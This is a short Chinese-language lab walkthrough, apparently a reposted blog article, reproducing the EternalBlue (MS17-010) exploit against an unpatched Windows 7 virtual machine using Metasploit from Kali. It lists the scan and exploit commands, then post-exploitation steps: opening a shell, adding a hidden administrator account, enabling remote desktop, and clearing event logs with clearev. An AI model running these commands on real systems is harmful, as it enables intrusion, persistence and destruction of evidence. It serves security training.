目錄
準(zhǔn)備靶機(jī)
測(cè)試ping連通性
攻擊漏洞
利用漏洞
準(zhǔn)備靶機(jī)
1臺(tái)kali,1臺(tái)win7
win7系統(tǒng)可以在MSDN鏡像網(wǎng)站里獲取
注:將win7安裝好,win7無法安裝vmtools,若升級(jí)系統(tǒng),可能會(huì)把永恒之藍(lán)補(bǔ)丁打上,所以建議別升級(jí)系統(tǒng)
?
?
測(cè)試ping連通性
win7的IP地址為192.168.164.129
?kali的IP地址為192.168.164.130
將這兩臺(tái)機(jī)器互ping發(fā)現(xiàn)可以ping通
?
攻擊漏洞
在kali系統(tǒng)里打開msf,每次打開msf的界面都不一樣
msfconsole
?搜索ms17_010
search ms17_010
?
?其中0模塊是漏洞攻擊模塊,對(duì)存在永恒之藍(lán)漏洞的目標(biāo)進(jìn)行攻擊,3模塊為掃描漏洞模塊,對(duì)目標(biāo)是否存在永恒之藍(lán)漏洞進(jìn)行掃描
首先使用3模塊掃描目標(biāo)是否存在永恒之藍(lán)漏洞
?輸入optinos可以查看獲得相關(guān)信息幫助
?設(shè)置目標(biāo)主機(jī)rhosts
set RHOSTS 192.168.164.129
?設(shè)置好后直接run即可
?如圖所示,信息提示說192.168.164.129存在ms17-010漏洞
在確定好存在漏洞后,可以返回使用0模塊進(jìn)行漏洞攻擊
?設(shè)置RHOSTS
?進(jìn)行攻擊使用exploit
?如果出現(xiàn)了meterpreter? 代表攻擊成功
利用漏洞
可以使用sysinfo顯示遠(yuǎn)程主機(jī)信息
?對(duì)遠(yuǎn)程主機(jī)進(jìn)行截圖操作
screenshot
?
獲得shell控制臺(tái):shell
輸入chcp 65001即可消除亂碼
添加用戶
net user test 123456 /add
net localgroup administrators test /add
?
?啟用遠(yuǎn)程桌面
run post/windows/manage/enable_rdp
使用rdesktop進(jìn)行遠(yuǎn)程登錄
rdesktop 192.168.164.129
?
?輸入剛剛添加的用戶
?遠(yuǎn)程登錄成功
清除日志
clearev
文章來源:http://www.zghlxwxcb.cn/news/detail-428577.html
?文章來源地址http://www.zghlxwxcb.cn/news/detail-428577.html
到了這里,關(guān)于復(fù)現(xiàn)永恒之藍(lán)[MS17_010]的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!